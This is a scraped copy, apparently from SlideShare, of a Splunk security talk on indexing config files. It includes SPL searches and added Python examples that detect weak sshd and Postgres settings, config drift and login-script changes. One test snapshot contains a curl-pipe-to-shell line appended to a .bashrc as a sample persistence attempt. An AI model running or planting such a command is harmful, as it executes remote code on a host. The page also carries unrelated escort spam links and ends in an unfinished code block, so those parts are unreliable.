Copyright © 2011, Splunk Inc. Listen to your data.
Splunk your Configs to Improve Security Posture
Daniel Wilson, Senior Security Engineer
11/4/2021
Agenda
• Introductions
• What is a Config file?
• Preparing Splunk
• Use Cases
• Gotchas
• Q&A
Summary
A quick security talk on how and why you would want to index your config files.
Introductions – Daniel Wilson
• Security? IT guy? Hey you?
• In security for more or less 8 years now
• Selling computers in ’97
• Speaks occasionally at the Splunk User Group
• Formal career and skills development coach at StubHub/eBay through the
Leader as Coach program and junior talent development
Splunk blogged about these features in 2007; that is where I learned these tricks:
https://www.splunk.com/en_us/blog/tips-and-tricks/dont-forget-to-index-your-config-files.html
Introductions – Establish Credibility
40 certs over the years... no idea which have expired
• Splunk Arch level 2, Splunk Admin, Splunk Power User
• AWS Security Specialist, MCSE Security, CCNA Sec, Security+, CySA+
• RHCSA, Cloud+, Linux+, CCNP Routing/Switching
• MTA Software Development, MTA Python
Other stuff
• Active defense, cloud security, network/systems security and
automation
• CIS and MITRE
• GDPR, PCI and SOX
• DevOps culture
Introductions – Audience
• Who’s in the audience?
– Splunk Admins
– Security Folk
– Auditors
– Compliance
What is a Config File
• Flat file, generally containing key/value settings
• Read by applications when they start (and often again on reload)
• Often contains critical settings
• Example: an sshd_config
• “ini” files on Windows
Use Cases – Why Splunk?
• Monitoring your configs is a critical part of your File Integrity
Monitoring (FIM) strategy
• Tools like AIDE tell you that something changed
• auditd tells you who changed it and when
• Both AIDE and auditd lack the content: what the setting was before and after
• Git-managed configs are great... security professionals have been
burned by lack of enforcement though: what is in the repo is not
necessarily what is on the host
Use Case – Looking at configs!
• Make an easy-to-use dashboard for auditors and non-technical users
• Tip: an rmcomments macro is included to strip comment lines and ease reading
Use Case – Comparing Config
• Compare two indexed copies of a file (search results come back newest
first, so head 2 gives you the current and the previous copy)
• Enrich your alerts with just the details: the lines that changed
index=configs source=/etc/ssh/sshd_config
| head 2
| diff pos1=1 pos2=2
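The view-and-compare use case (the rmcomments tip and the head 2 | diff search above) as an added Python example; this is not code from the deck or from Splunk_TA_nix. The two sshd_config copies are constructed, the names rm_comments and diff_configs are chosen here, and it runs offline: it drops comment-only lines the way the macro would, then reports only the effective settings that differ between the previous and the current copy, which is the part you would put in an alert.

```python
import difflib
import re
from typing import List

# Constructed sample: two successive indexed copies of /etc/ssh/sshd_config
# from one host, as `| head 2` would return them (newest first). The content
# is hypothetical and not taken from any real system.
SSHD_CONFIG_NEW = """\
# OpenSSH server configuration (constructed sample)
Port 22
#PermitRootLogin prohibit-password
PermitRootLogin yes
PasswordAuthentication yes
PermitEmptyPasswords no
Subsystem sftp /usr/lib/openssh/sftp-server
"""

SSHD_CONFIG_OLD = """\
# OpenSSH server configuration (constructed sample)
Port 22
#PermitRootLogin prohibit-password
PermitRootLogin no
PasswordAuthentication no
PermitEmptyPasswords no
Subsystem sftp /usr/lib/openssh/sftp-server
"""

_COMMENT_OR_BLANK = re.compile(r"^\s*(#.*)?$")


def rm_comments(text: str) -> List[str]:
    """Drop comment-only and blank lines plus trailing whitespace.

    Same idea as the deck's rmcomments macro: auditors want the effective
    settings, not the distribution's commented-out defaults.
    """
    return [ln.rstrip() for ln in text.splitlines() if not _COMMENT_OR_BLANK.match(ln)]


def diff_configs(old: str, new: str, label: str = "sshd_config") -> List[str]:
    """Unified diff of the effective settings, old -> new.

    Returns only the removed (-) and added (+) lines, the 'just the details'
    you would attach to an alert; file headers and hunk markers are dropped.
    """
    delta = difflib.unified_diff(
        rm_comments(old), rm_comments(new),
        fromfile=f"{label} (previous)", tofile=f"{label} (current)",
        lineterm="", n=0,
    )
    return [
        ln for ln in delta
        if ln.startswith(("+", "-")) and not ln.startswith(("+++", "---"))
    ]


if __name__ == "__main__":
    for line in diff_configs(SSHD_CONFIG_OLD, SSHD_CONFIG_NEW):
        print(line)
```

Run it as-is to see the two settings that changed; in Splunk the same output is what the `diff` command hands you for the two events, and this version shows what to expect from it once comments are stripped.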
Use Case – Alert on Login Script Changes
• An actual control I implemented; it later caught our internal
red team post-compromise
• Add an input covering all the login scripts for your platform
• Caveat: the glob below also matches .bash_history, so add a blacklist to
the inputs.conf monitor stanza unless you want every user's command
history (and whatever was typed into it) in the index
• Run this search as a scheduled job every 15 minutes
index=configs source="/home/*/.bash*"
Use Cases – Clear Text in Database
• Example of detecting clear-text passwords in Postgres: the "password"
method in pg_hba.conf has the client send the password unencrypted
• Note the inline search-time extraction (rex); with KV_MODE = none
nothing is extracted by default
• Tip: add CIM fields like app to your results to improve searches
index=configs sourcetype=config_file source=*pg_hba* " password"
| dedup host, source
| rex field=_raw "host.*(?<insecure>password)"
| eval message = "Clear text passwords accepted by Postgres"
| eval app = "Postgres"
| table host, source, _raw, app
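The pg_hba.conf check as an added Python example; it is not the deck's search and not code from any Splunk app. The pg_hba.conf content and the host name db01 are constructed, and parse_pg_hba and find_insecure_auth are names chosen here. It goes beyond the rex in the search in two ways: it parses the records properly, so a commented-out rule or the older two-column address/netmask form cannot confuse it, and it also flags the trust method, which checks no credential at all.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed pg_hba.conf for a hypothetical host; not from a real system.
# Line 6 is commented out and must not fire; line 8 uses the older
# 'address netmask' form with two columns.
PG_HBA_SAMPLE = """\
# TYPE  DATABASE  USER      ADDRESS                    METHOD
local   all       postgres                             peer
host    all       all       127.0.0.1/32               scram-sha-256
host    all       all       ::1/128                    scram-sha-256
# the next line is a comment and must not fire
#host   all       all       10.0.0.0/8                 password
host    billing   app       10.10.0.0/16               password
hostssl reporting analyst   192.168.1.0 255.255.255.0  md5
host    all       all       0.0.0.0/0                  trust
"""

# Methods worth an alert. 'password' is the deck's case: the client sends the
# password in clear text. 'trust' is an added generalisation: no credential
# is checked at all.
INSECURE_METHODS: Dict[str, str] = {
    "password": "clear-text password accepted",
    "trust": "no authentication required",
}

_DOTTED_QUAD = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


@dataclass(frozen=True)
class HbaRule:
    conn_type: str
    database: str
    user: str
    address: str   # '' for local (Unix socket) rules
    method: str
    lineno: int


def parse_pg_hba(text: str) -> List[HbaRule]:
    """Parse pg_hba.conf records; comments, blank and malformed lines are skipped."""
    rules = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        fields = raw.split("#", 1)[0].split()
        if not fields:
            continue
        conn_type = fields[0].lower()
        if conn_type == "local":
            # local  DATABASE  USER  METHOD  [OPTIONS]
            if len(fields) < 4:
                continue
            database, user, address, method = fields[1], fields[2], "", fields[3]
        else:
            # host*  DATABASE  USER  ADDRESS  [NETMASK]  METHOD  [OPTIONS]
            if len(fields) < 5:
                continue
            database, user, address = fields[1], fields[2], fields[3]
            idx = 4
            if _DOTTED_QUAD.match(fields[idx]) and len(fields) > idx + 1:
                address = f"{address}/{fields[idx]}"
                idx += 1
            method = fields[idx]
        rules.append(HbaRule(conn_type, database, user, address, method.lower(), lineno))
    return rules


def find_insecure_auth(text: str, host: str = "db01",
                       source: str = "/etc/postgresql/pg_hba.conf") -> List[Dict[str, object]]:
    """One alert row per insecure rule, shaped like the deck's result table."""
    findings = []
    for rule in parse_pg_hba(text):
        if rule.method in INSECURE_METHODS:
            findings.append({
                "host": host,
                "source": source,
                "app": "Postgres",
                "line": rule.lineno,
                "method": rule.method,
                "scope": f"{rule.conn_type} {rule.database} {rule.user} {rule.address}".strip(),
                "message": INSECURE_METHODS[rule.method],
            })
    return findings


if __name__ == "__main__":
    for finding in find_insecure_auth(PG_HBA_SAMPLE):
        print(finding)
```

The scope column is what makes the alert actionable for a DBA: "host billing app 10.10.0.0/16 password" says exactly which rule to fix, where the deck's table only gives the whole file as _raw.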
Use Case – SSHD Empty Passwords?
• Great compliance search right here, tweakable
• Note: you might want to script the input here (see the scripted-input
trick under inputs.conf below); otherwise the earliest=-48h window only
finds files whose modification time falls in the last two days
• Tip: enrich your alerts with MITRE details
index=configs sourcetype=config_file source=/etc/ssh/sshd_config
earliest=-48h latest=now
| dedup index, sourcetype, host, source
| rex mode=sed "s/#PasswordAuthentication yes//g"
| search "PermitEmptyPasswords yes" OR "PermitEmptyPasswords Yes"
| eval vrisk_score = 100, domain="Endpoint", dest=host, dest_dns=host
| eval reason="Endpoint - SSH PermitEmptyPasswords yes set"
| eval MITRE="T1110"
| eval _time = now()
| table dest, vrisk_score, domain, reason, MITRE
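The PermitEmptyPasswords check as an added Python example; it is not the deck's search and not code from Splunk. The three host configs are constructed and effective_setting and check_empty_passwords are names chosen here. Unlike the sed-then-search approach it evaluates the file the way sshd does: comment lines are skipped, the first value obtained for a keyword wins, and a value set inside a Match block is not the global value, so it fires neither on a commented-out default nor on a Match-scoped yes.

```python
import re
from typing import Dict, List, Optional

# Constructed sshd_config samples for three hypothetical hosts (not real
# systems). 'bastion' leaves the distro default commented out and sets an
# explicit yes; 'web01' only carries the commented-out default, which is
# what the deck's sed step exists to keep from matching; 'db01' sets yes
# only inside a Match block, which is not the global value.
SAMPLES: Dict[str, str] = {
    "bastion": (
        "Port 22\n"
        "#PermitEmptyPasswords no\n"
        "PasswordAuthentication yes\n"
        "PermitEmptyPasswords yes\n"
        "Match User deploy\n"
        "    PermitEmptyPasswords no\n"
    ),
    "web01": (
        "Port 22\n"
        "#PermitEmptyPasswords no\n"
        "PasswordAuthentication no\n"
    ),
    "db01": (
        "Port 22\n"
        "PermitEmptyPasswords no\n"
        "Match Address 10.0.0.0/8\n"
        "    PermitEmptyPasswords yes\n"
    ),
}

# keyword, then either '=' with optional spaces or plain whitespace, then the value
_KV = re.compile(r"^\s*([A-Za-z][A-Za-z0-9]*)(?:\s*=\s*|\s+)(.*?)\s*$")


def effective_setting(config: str, keyword: str) -> Optional[str]:
    """Global value sshd would use for `keyword`, or None if it is unset.

    sshd_config rules applied: lines whose first non-blank character is '#'
    are comments, keywords are case-insensitive, the first value obtained
    for a keyword wins, and everything after a 'Match' line applies only to
    matching connections, so it is ignored for the global value.
    """
    for raw in config.splitlines():
        if raw.lstrip().startswith("#"):
            continue
        m = _KV.match(raw)
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2)
        if key == "match":
            break
        if key == keyword.lower():
            return value
    return None


def check_empty_passwords(configs: Dict[str, str]) -> List[Dict[str, object]]:
    """One risk row (the deck's column set) per host that permits empty passwords."""
    rows = []
    for host, text in configs.items():
        value = effective_setting(text, "PermitEmptyPasswords")
        if value is not None and value.lower() == "yes":
            rows.append({
                "dest": host,
                "vrisk_score": 100,
                "domain": "Endpoint",
                "reason": "Endpoint - SSH PermitEmptyPasswords yes set",
                "MITRE": "T1110",
            })
    return rows


if __name__ == "__main__":
    for row in check_empty_passwords(SAMPLES):
        print(row)
```

Only bastion produces a row. If you want Match-scoped settings reported as well, treat them as a separate, lower-scored finding rather than folding them into the global check; a yes that applies to one address range is a different risk from a yes that applies to everyone.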
Use Case – Config Drift
• By using the md5 function on _raw we can see the drift: hosts whose
hash of the file differs from the rest
• Consider sorting by your data gardens for compliance reports
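The login-script alert (above) and the md5 drift report share one idea, so here is one added Python example for both; it is not the deck's code. The snapshots (hosts web01 to web03, the login scripts, the appended curl line) are constructed, and fingerprint, login_script_changes, config_drift and outliers are names chosen here. The first function is the 15-minute job expressed as a comparison of two runs; the other two group hosts by md5 of one source and pick out the hosts that disagree with the majority.

```python
import hashlib
from collections import defaultdict
from typing import Dict, List, Tuple

Snapshot = List[Tuple[str, str, str]]  # (host, source, content)

# Constructed snapshots of login scripts as two consecutive runs of the
# 15-minute job would see them. Hypothetical hosts and content.
ALICE_BASHRC = "export PATH=$HOME/bin:$PATH\nalias ll='ls -la'\n"
ALICE_PROFILE = "[ -f ~/.bashrc ] && . ~/.bashrc\n"

PREVIOUS_RUN: Snapshot = [
    ("web01", "/home/alice/.bashrc", ALICE_BASHRC),
    ("web01", "/home/alice/.bash_profile", ALICE_PROFILE),
    ("web02", "/home/alice/.bashrc", ALICE_BASHRC),
    ("web03", "/home/alice/.bashrc", ALICE_BASHRC),
]
CURRENT_RUN: Snapshot = [
    # a line appended to web01's copy (hypothetical persistence attempt)
    ("web01", "/home/alice/.bashrc", ALICE_BASHRC + "curl -s http://10.0.0.9/x | sh\n"),
    ("web01", "/home/alice/.bash_profile", ALICE_PROFILE),
    ("web02", "/home/alice/.bashrc", ALICE_BASHRC),
    ("web03", "/home/alice/.bashrc", ALICE_BASHRC),
    ("web02", "/home/bob/.bashrc", "alias ll='ls -la'\n"),   # new since last run
]


def fingerprint(content: str) -> str:
    """md5 of the content: the role the deck's md5(_raw) plays in SPL (a
    fingerprint for equality, not a security control)."""
    return hashlib.md5(content.encode("utf-8")).hexdigest()


def login_script_changes(previous: Snapshot, current: Snapshot) -> List[Dict[str, str]]:
    """Report NEW, CHANGED and REMOVED login scripts between two runs.

    Unchanged scripts produce no row, so an empty list means nothing to alert on.
    """
    before = {(h, s): fingerprint(c) for h, s, c in previous}
    after = {(h, s): fingerprint(c) for h, s, c in current}
    changes = []
    for key in sorted(before.keys() | after.keys()):
        if key not in before:
            status = "NEW"
        elif key not in after:
            status = "REMOVED"
        elif before[key] != after[key]:
            status = "CHANGED"
        else:
            continue
        changes.append({"host": key[0], "source": key[1], "status": status})
    return changes


def config_drift(snapshot: Snapshot, source: str) -> Dict[str, List[str]]:
    """Group hosts by md5 of one source; more than one key means drift."""
    groups: Dict[str, List[str]] = defaultdict(list)
    for host, src, content in snapshot:
        if src == source:
            groups[fingerprint(content)].append(host)
    return {digest: sorted(hosts) for digest, hosts in groups.items()}


def outliers(groups: Dict[str, List[str]]) -> List[str]:
    """Hosts outside the largest group: the ones an auditor should look at first."""
    if len(groups) < 2:
        return []
    majority = max(groups.values(), key=len)
    return sorted(h for hosts in groups.values() if hosts is not majority for h in hosts)


if __name__ == "__main__":
    for change in login_script_changes(PREVIOUS_RUN, CURRENT_RUN):
        print(change)
    print(outliers(config_drift(CURRENT_RUN, "/home/alice/.bashrc")))
```

Both views point at the same host here, which is the usual pattern: the change alert tells you when web01 diverged, and the drift report tells you it is the only host that did. In Splunk the grouping step is `| eval h=md5(_raw) | stats values(host) by source, h`.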
Splunk Admin
• Splunk_TA_nix does all this:
– Props
– Inputs
– Indexes
• I put all of this in an app called TA-configsdemo on Splunkbase to help
you play with these settings without dealing with Splunk_TA_nix
Splunk – Props.conf
• Rather than one event per line, Splunk creates one event per file
• You can and should review your effective settings with btool
• I noticed 4 settings in props.conf that are worthy of conversation
• Run btool on your indexer and on your search head
AUTO_KV_JSON = true
CHECK_METHOD = modtime
DATETIME_CONFIG = NONE
KV_MODE = none
$ ./splunk cmd btool props list config_file
Props - AUTO_KV_JSON
AUTO_KV_JSON = <boolean>
* Used for search-time field extractions only.
* Specifies whether to try json extraction automatically.
* Default: true
• Meaning that if your file is well-structured JSON you get field
extraction at search time by default
• I used another sourcetype for this
Props - CHECK_METHOD = modtime
File checksum configuration
* Set CHECK_METHOD to "endpoint_md5" to have Splunk software perform a checksum of the
first and last 256 bytes of a file. When it finds matches, Splunk software lists the file as already
indexed and indexes only new data, or ignores it if there is no new data.
* Set CHECK_METHOD to "modtime" to check only the modification time of the file.
• Super helpful on config files that are really small and don't have enough characters to be
checked with the first and last 256 bytes. It avoids the "too small" problem in Splunk sourcetypes.
Props - DATETIME_CONFIG = NONE
"NONE" leaves the event time set to whatever time was selected by the input layer
* For data sent by Splunk forwarders over the Splunk-to-Splunk protocol, the input layer is the
time that was selected on the forwarder by its input behavior (as below).
* For file-based inputs (monitor, batch) the time chosen is the modification timestamp on the file
being read.
* For other inputs, the time chosen is the current system time when the event is read from the
pipe/socket/etc.
* Both "CURRENT" and "NONE" explicitly disable the per-text timestamp identification, so the
default event boun
• In this case a config file is stamped with its modification time, so an untouched distribution
default (on CentOS, for example) can be dated 6-7 years ago. You need to consider this in your
indexer retention strategy.
Props - KV_MODE = none
* none: if you want no field/value extraction to take place.
• You will NOT get field extractions by default from your config files
• While many config files are key/value, the events are large (a whole
file each), so turning search-time KV extraction on is expensive
inputs.conf
[monitor:///etc/ssh/sshd_conf*]
index=configs
sourcetype=config_file
If you have Splunk_TA_nix installed, or configured props.conf as described
above, this sourcetype assignment is all the input needs.
inputs.conf, cont
• Trick: cat a file in via a scripted input
• The event time will be NOW (the run time), not the file's mtime
• This saved our auditors days
• The md5 of the content is identical to what the monitor input indexes
• Make sure the file is there before you cat it (the -f test below)!
…
do-execcat() {
    # display config: only emit the file if it exists, so a missing file
    # produces no event rather than a cat error in the index
    if [ -f "$strConfigLocation" ]; then
        cat "$strConfigLocation"
    fi
}
…
[script://./bin/cat_sshd_config.sh]
index=osnixvcustom
sourcetype=config_file
source=/etc/ssh/sshd_config
interval=86400
Indexer Stuff
• Very low sourcetype uniformity: every config file has its own shape
• Don't mix it with other data types in one index for this reason
• Ideally not a default search index either: whole-file events are a large
set of characters and strings compared with a traditional log event
Gotchas
• Config files are cheap (small files, so little license impact)
• Watch out for shared file systems: a file on a shared mount gets indexed
once per host that mounts it
• Ensure your index permissions are well managed: configs describe your environment
• Don't index any secrets you don't want collected
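The scripted-input trick and the last gotcha together, as an added Python example that is not the deck's script and not Splunk code: the sample app.conf, the key list in _SECRET_LINE and the inputs.conf stanza in the comment are assumptions made here. It does what the cat wrapper does (emit the file, nothing if it is missing) and additionally blanks the values of secret-looking keys before they reach the index. Note the trade-off: a redacted line no longer hashes to the same md5 as the monitored copy, so apply it only to files that actually carry secrets.

```python
import re
import sys
from typing import Tuple

# Keys whose values must never reach the index. The key list and the
# 'key = value' / 'key: value' shapes are assumptions for this demo; extend
# them for your own config dialects (sshd-style 'Key value' lines are not
# touched, which is deliberate: sshd_config carries no secrets).
_SECRET_LINE = re.compile(
    r"^(?P<lead>\s*[#;]?\s*"
    r"(?P<key>[A-Za-z0-9_.\-]*(?:password|passwd|secret|token|api_?key|private_?key)[A-Za-z0-9_.\-]*)"
    r"\s*[=:]\s*)"
    r"(?P<value>\S.*?)\s*$",
    re.IGNORECASE,
)
REDACTED = "<redacted>"

# Constructed sample, hypothetical content; not from any real system.
SAMPLE_APP_CONF = """\
[database]
host = db01.internal
db_password = hunter2
# old_api_key = abc123
[ssh]
PasswordAuthentication yes
"""


def redact_line(line: str) -> Tuple[str, bool]:
    """Return (line with its secret value replaced, whether anything changed).

    Only the value is replaced: the key survives so a search for 'password'
    still finds the setting, and drift detection still notices a key that
    appears or disappears. Commented-out secrets are redacted too.
    """
    m = _SECRET_LINE.match(line)
    if not m or m.group("value") == REDACTED:
        return line, False
    return m.group("lead") + REDACTED, True


def redact_config(text: str) -> Tuple[str, int]:
    """Redact every secret-bearing line; returns (new text, number redacted)."""
    out, count = [], 0
    for line in text.splitlines():
        new_line, hit = redact_line(line)
        out.append(new_line)
        count += int(hit)
    tail = "\n" if text.endswith("\n") else ""
    return "\n".join(out) + tail, count


def emit_config(path: str, redact: bool = True) -> str:
    """Scripted-input body: what should be written to stdout for `path`.

    Mirrors the deck's `if [ -f ... ]; then cat ...; fi`: a missing or
    unreadable file yields an empty string (no event), never a traceback
    in the index.
    """
    try:
        with open(path, encoding="utf-8", errors="replace") as fh:
            text = fh.read()
    except OSError:
        return ""
    return redact_config(text)[0] if redact else text


if __name__ == "__main__":
    # Hypothetical inputs.conf stanza for this script (not from the deck):
    #   [script://./bin/cat_config.py /etc/myapp/app.conf]
    #   sourcetype = config_file
    #   source = /etc/myapp/app.conf
    #   interval = 86400
    sys.stdout.write(emit_config(sys.argv[1] if len(sys.argv) > 1 else "/etc/ssh/sshd_config"))
```

Run it with a path argument to see the redacted output; on the sample it blanks db_password and the commented-out old_api_key and leaves everything else, including the sshd-style PasswordAuthentication line, byte for byte as it was.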
Thank You :)

Beautiful Sapna Vip Call Girls Hauz Khas 9711199012 Call /Whatsapps
 
Ukraine War presentation: KNOW THE BASICS
Ukraine War presentation: KNOW THE BASICSUkraine War presentation: KNOW THE BASICS
Ukraine War presentation: KNOW THE BASICS
 
From idea to production in a day – Leveraging Azure ML and Streamlit to build...
From idea to production in a day – Leveraging Azure ML and Streamlit to build...From idea to production in a day – Leveraging Azure ML and Streamlit to build...
From idea to production in a day – Leveraging Azure ML and Streamlit to build...
 
Kantar AI Summit- Under Embargo till Wednesday, 24th April 2024, 4 PM, IST.pdf
Kantar AI Summit- Under Embargo till Wednesday, 24th April 2024, 4 PM, IST.pdfKantar AI Summit- Under Embargo till Wednesday, 24th April 2024, 4 PM, IST.pdf
Kantar AI Summit- Under Embargo till Wednesday, 24th April 2024, 4 PM, IST.pdf
 
Data Warehouse , Data Cube Computation
Data Warehouse   , Data Cube ComputationData Warehouse   , Data Cube Computation
Data Warehouse , Data Cube Computation
 
VIP Call Girls Service Charbagh { Lucknow Call Girls Service 9548273370 } Boo...
VIP Call Girls Service Charbagh { Lucknow Call Girls Service 9548273370 } Boo...VIP Call Girls Service Charbagh { Lucknow Call Girls Service 9548273370 } Boo...
VIP Call Girls Service Charbagh { Lucknow Call Girls Service 9548273370 } Boo...
 
Market Analysis in the 5 Largest Economic Countries in Southeast Asia.pdf
Market Analysis in the 5 Largest Economic Countries in Southeast Asia.pdfMarket Analysis in the 5 Largest Economic Countries in Southeast Asia.pdf
Market Analysis in the 5 Largest Economic Countries in Southeast Asia.pdf
 
dokumen.tips_chapter-4-transient-heat-conduction-mehmet-kanoglu.ppt
dokumen.tips_chapter-4-transient-heat-conduction-mehmet-kanoglu.pptdokumen.tips_chapter-4-transient-heat-conduction-mehmet-kanoglu.ppt
dokumen.tips_chapter-4-transient-heat-conduction-mehmet-kanoglu.ppt
 
EMERCE - 2024 - AMSTERDAM - CROSS-PLATFORM TRACKING WITH GOOGLE ANALYTICS.pptx
EMERCE - 2024 - AMSTERDAM - CROSS-PLATFORM  TRACKING WITH GOOGLE ANALYTICS.pptxEMERCE - 2024 - AMSTERDAM - CROSS-PLATFORM  TRACKING WITH GOOGLE ANALYTICS.pptx
EMERCE - 2024 - AMSTERDAM - CROSS-PLATFORM TRACKING WITH GOOGLE ANALYTICS.pptx
 
High Class Call Girls Noida Sector 39 Aarushi 🔝8264348440🔝 Independent Escort...
High Class Call Girls Noida Sector 39 Aarushi 🔝8264348440🔝 Independent Escort...High Class Call Girls Noida Sector 39 Aarushi 🔝8264348440🔝 Independent Escort...
High Class Call Girls Noida Sector 39 Aarushi 🔝8264348440🔝 Independent Escort...
 
Delhi 99530 vip 56974 Genuine Escort Service Call Girls in Kishangarh
Delhi 99530 vip 56974 Genuine Escort Service Call Girls in  KishangarhDelhi 99530 vip 56974 Genuine Escort Service Call Girls in  Kishangarh
Delhi 99530 vip 56974 Genuine Escort Service Call Girls in Kishangarh
 
Building on a FAIRly Strong Foundation to Connect Academic Research to Transl...
Building on a FAIRly Strong Foundation to Connect Academic Research to Transl...Building on a FAIRly Strong Foundation to Connect Academic Research to Transl...
Building on a FAIRly Strong Foundation to Connect Academic Research to Transl...
 
VIP High Class Call Girls Bikaner Anushka 8250192130 Independent Escort Servi...
VIP High Class Call Girls Bikaner Anushka 8250192130 Independent Escort Servi...VIP High Class Call Girls Bikaner Anushka 8250192130 Independent Escort Servi...
VIP High Class Call Girls Bikaner Anushka 8250192130 Independent Escort Servi...
 
VIP Call Girls Service Miyapur Hyderabad Call +91-8250192130
VIP Call Girls Service Miyapur Hyderabad Call +91-8250192130VIP Call Girls Service Miyapur Hyderabad Call +91-8250192130
VIP Call Girls Service Miyapur Hyderabad Call +91-8250192130
 
Unveiling Insights: The Role of a Data Analyst
Unveiling Insights: The Role of a Data AnalystUnveiling Insights: The Role of a Data Analyst
Unveiling Insights: The Role of a Data Analyst
 
100-Concepts-of-AI by Anupama Kate .pptx
100-Concepts-of-AI by Anupama Kate .pptx100-Concepts-of-AI by Anupama Kate .pptx
100-Concepts-of-AI by Anupama Kate .pptx
 
E-Commerce Order PredictionShraddha Kamble.pptx
E-Commerce Order PredictionShraddha Kamble.pptxE-Commerce Order PredictionShraddha Kamble.pptx
E-Commerce Order PredictionShraddha Kamble.pptx
 
VIP High Class Call Girls Jamshedpur Anushka 8250192130 Independent Escort Se...
VIP High Class Call Girls Jamshedpur Anushka 8250192130 Independent Escort Se...VIP High Class Call Girls Jamshedpur Anushka 8250192130 Independent Escort Se...
VIP High Class Call Girls Jamshedpur Anushka 8250192130 Independent Escort Se...
 
Dubai Call Girls Wifey O52&786472 Call Girls Dubai
Dubai Call Girls Wifey O52&786472 Call Girls DubaiDubai Call Girls Wifey O52&786472 Call Girls Dubai
Dubai Call Girls Wifey O52&786472 Call Girls Dubai
 

Splunking configfiles 20211208_daniel_wilson

8. Use Cases – Why Splunk?
• Monitoring your configs is a critical part of your File Integrity Monitoring (FIM) strategy
• Tools like AIDE tell you that something changed
• auditd tells you who changed it and when
• Both AIDE and auditd lack the content: neither records what the file now says
• Git-managed configs are great, but security professionals have been burned by the lack of enforcement (nothing stops a hand edit on the box)

9. Use Case – Looking at configs!
• Make an easy-to-use dashboard for auditors and non-technical users
• Tip: an rmcomments macro is included to strip the comment lines and ease reading

10. Use Case – Comparing Configs
• Compare two copies of a file manually with the diff command
• Enrich your alerts with just the details that changed
• Caveat: head 2 takes the two most recent events matching the search, so without a host= filter the two copies may come from different hosts; add host=<name> when you mean "this host's current copy vs its previous one"

  index=configs source=/etc/ssh/sshd_config | head 2 | diff pos1=1 pos2=2

11. Use Case – Alert on Login Script Changes
• An actual control I implemented that later caught our internal red team after getting p0wned
• Add an input for all the login scripts on your platform
• Run this search every 15 minutes, scoped to the last 15 minutes (earliest=-15m), so only newly indexed copies, i.e. files whose modification time changed, trigger the alert

  index=configs source="/home/*/.bash*"

12. Use Cases – Clear Text in Database
• Example of detecting clear-text passwords accepted by PostgreSQL: a pg_hba.conf rule whose METHOD is password sends the password unencrypted
• Note the inline rex extraction: the config_file sourcetype sets KV_MODE = none, so nothing is extracted by default
• Tip: add CIM fields like app to your results to improve searches

  index=configs sourcetype=config_file source=*pg_hba* " password"
  | dedup host, source
  | rex field=_raw "host.*(?<insecure>password)"
  | eval message = "Clear text passwords accepted by Postgres"
  | eval app = "Postgres"
  | table host, source, _raw, app

13. Use Case – SSHD Empty Passwords?
• Great compliance search right here, tweakable
• Note: you might want to script the input for this one. With DATETIME_CONFIG = NONE the event time is the file's modification time, so an sshd_config last edited years ago never falls inside earliest=-48h; a scripted input stamps the copy with the current time (see the inputs.conf slides)
• Tip: enrich your alerts with MITRE ATT&CK details
• Caveat: search is a case-insensitive substring match over the whole file event, so the second OR term is redundant and a commented-out "#PermitEmptyPasswords yes" also matches. The sed line only strips one specific commented directive; strip all comment lines (the rmcomments macro) before searching to avoid that false positive

  index=configs sourcetype=config_file source=/etc/ssh/sshd_config earliest=-48h latest=now
  | dedup index, sourcetype, host, source
  | rex mode=sed "s/#PasswordAuthentication yes//g"
  | search "PermitEmptyPasswords yes" OR "PermitEmptyPasswords Yes"
  | eval vrisk_score = 100, domain="Endpoint", dest=host, dest_dns=host
  | eval reason="Endpoint - SSH PermitEmptyPasswords yes set"
  | eval MITRE="T1110"
  | eval _time = now()
  | table dest, vrisk_score, domain, reason, MITRE
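The pg_hba.conf search on slide 12 and the PermitEmptyPasswords search on slide 13 both match substrings over the whole file event, so a directive that is only present as a comment matches too. The following is an added example, not code from the talk or from the TA-configsdemo app, of the same two checks done comment-aware in Python, the way you would write them in an external script or a custom search command. The sample file contents are constructed for the example; the sshd parsing follows the documented sshd_config rules (case-insensitive keywords, first occurrence wins) but does not model Match blocks.

```python
import re

# Constructed sample files (not from the talk). The first one is the false-positive
# case: the weak directive is present only as a comment.
SSHD_COMMENTED = """# an admin disabled the weak setting by commenting it out
#PermitEmptyPasswords yes
PasswordAuthentication no
"""

SSHD_WEAK = """Port 22
PermitEmptyPasswords yes
PasswordAuthentication yes
"""

PG_HBA = """# TYPE  DATABASE  USER  ADDRESS         METHOD
local   all       all                   peer
host    all       all   10.0.0.0/8      scram-sha-256
host    all       all   0.0.0.0/0       password
host    all       all   192.168.0.0  255.255.255.0  md5
hostssl app       app   0.0.0.0/0       password
"""


def naive_search(raw, needle):
    """What `| search "PermitEmptyPasswords yes"` does over a one-event-per-file
    sourcetype: a case-insensitive substring match that also hits commented lines."""
    return needle.lower() in raw.lower()


def active_lines(raw):
    """Yield non-blank, non-comment lines; the step the slide's sed line only
    approximates (it strips a single commented directive)."""
    for line in raw.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            yield line


def sshd_directives(raw):
    """Effective sshd_config keyword -> value. Keywords are case-insensitive and the
    first occurrence wins, as in sshd itself. Match blocks are not modelled."""
    directives = {}
    for line in active_lines(raw):
        # sshd accepts "Keyword value" and "Keyword=value"
        parts = re.split(r"\s*=\s*|\s+", line, maxsplit=1)
        if len(parts) == 2:
            directives.setdefault(parts[0].lower(), parts[1].strip())
    return directives


def sshd_permits_empty_passwords(raw):
    """True only when an active (uncommented) PermitEmptyPasswords yes is in effect."""
    return sshd_directives(raw).get("permitemptypasswords", "no").lower() == "yes"


# Auth methods pg_hba.conf can name; used to locate the METHOD column, because the
# ADDRESS column may be one field (CIDR) or two (ip netmask).
PG_METHODS = {"trust", "reject", "scram-sha-256", "md5", "password", "gss", "sspi",
              "ident", "peer", "ldap", "radius", "cert", "pam", "bsd"}


def pg_hba_cleartext_rules(raw):
    """Rules using the 'password' method, which sends the password unencrypted unless
    the record type is hostssl. Returns (type, database, user, address, over_tls)."""
    findings = []
    for line in active_lines(raw):
        fields = line.split()
        if len(fields) < 4:
            continue
        conn_type = fields[0]
        method = next((f for f in fields[3:] if f in PG_METHODS), None)
        if method != "password":
            continue
        address = "" if conn_type == "local" else fields[3]
        findings.append((conn_type, fields[1], fields[2], address, conn_type == "hostssl"))
    return findings


if __name__ == "__main__":
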